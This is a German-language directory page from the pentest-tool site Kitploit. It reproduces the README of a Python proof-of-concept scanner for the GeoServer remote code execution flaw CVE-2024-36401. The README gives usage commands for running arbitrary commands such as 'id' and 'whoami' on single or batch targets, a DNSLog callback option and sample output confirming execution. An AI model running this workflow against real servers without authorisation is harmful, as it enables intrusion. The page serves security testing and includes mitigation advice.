Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — Dieses Skript ist ein PoC (Proof of Concept)-Erkennungstool, das für die Remote-Codeausführungsschwachstelle (CVE-2024-36401) in GeoServer entwickelt wurde. Diese Schwachstelle ermöglicht es Angreifern, durch das Erstellen spezifischer Anfragen beliebige Befehle auf dem Zielserver auszuführen. | Kitploit
Tools/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Über

Dieses Skript ist ein PoC (Proof of Concept)-Erkennungstool, das für die Remote-Codeausführungsschwachstelle (CVE-2024-36401) in GeoServer entwickelt wurde. Diese Schwachstelle ermöglicht es Angreifern, durch das Erstellen spezifischer Anfragen beliebige Befehle auf dem Zielserver auszuführen.

Teilen

⚠️ Haftungsausschluss: Dieses Tool dient ausschließlich zu Sicherheitsforschungs- und legalen autorisierten Testzwecken. Es darf nicht für illegale Zwecke verwendet werden. Der Benutzer trägt die rechtliche Verantwortung selbst.

README Version: [English | 中文]

Schwachstellenbeschreibung

Dieses Skript ist ein PoC-Erkennungstool (Proof of Concept) für die Remote-Code-Ausführungsschwachstelle (CVE-2024-36401) in GeoServer. Diese Schwachstelle ermöglicht es Angreifern, durch das Senden speziell konstruierter Anfragen beliebige Befehle auf dem Zielserver auszuführen.


Umgebungsabhängigkeiten

Stelle sicher, dass die folgenden Abhängigkeiten in deiner Laufzeitumgebung installiert sind:

  • Python 3.x
  • Drittanbieter-Bibliotheken:
    • requests
    • lxml

Installiere die benötigten Abhängigkeiten mit folgendem Befehl:

root@kitploit:~
pip install requests lxml

Verwendung

Einzelnes Ziel testen

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

Oder einen auszuführenden Befehl angeben:

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

Mehrere Ziele im Batch testen

Bereite eine Textdatei mit mehreren Ziel-URLs vor (eine pro Zeile):

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

Oder einen Befehl angeben:

root@kitploit:~
python poc.py -uf targets.txt -c "id"

Ausführliche Nutzungshinweise: Detaillierte Nutzungsdokumentation


Parameterbeschreibung

⚠️ Hinweis: Die Parameter -d und -c können nicht gleichzeitig verwendet werden.


Beispielausgabe

root@kitploit:~
[INFO] 3 gültige Typenamen gefunden, starte Schwachstellenerkennung
[INFO] Ziel: http://example.com
[INFO] Ausführbarer Befehl: whoami
[INFO] DNSLOG-Adresse:

[INFO] Versuche typeName: topp:states -> whoami
[+] Befehl scheint erfolgreich ausgeführt worden zu sein! Ziel: http://example.com Befehl: whoami

Skripteigenschaften

  • Behebt das Problem in Nuclei-PoCs, bei dem die Typnamen fest codiert waren und die Schwachstellenüberprüfung fehlschlug.
  • Sammelt automatisch alle Typnamen und testet zyklisch die verwendbaren Typnamen.
  • Unterstützt die Ausführung von Befehlen über den Parameter -c.
  • Unterstützt die Übergabe einer URL-Datei, um mehrere Ziele auf die Schwachstelle zu testen.

Sicherheitsempfehlungen

  • Aktualisiere GeoServer umgehend auf die offiziellste Version.
  • Beschränke den Zugriff auf öffentlich zugängliche GeoServer-Instanzen.
  • Konfiguriere Firewalls, um die Zugriffsquellen auf den Endpunkt /geoserver/wfs einzuschränken.

Beiträge

Issue- oder Pull-Request-Beiträge zur Verbesserung dieses Projekts sind willkommen.


Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert. Du darfst es frei modifizieren, verteilen und kommerziell nutzen, musst jedoch den Urheberrechtshinweis beibehalten.


Tool herunterladen
ParameterBeschreibung
-u, --urlGibt eine einzelne Zieladresse an
-uf, --url-fileGibt den Pfad zu einer Datei mit mehreren Ziel-URLs an
-d, --dnslogGibt die DNSLog-Adresse an
-c, --commandGibt den Befehl an, der auf dem Zielsystem ausgeführt werden soll (z. B. whoami, id, curl)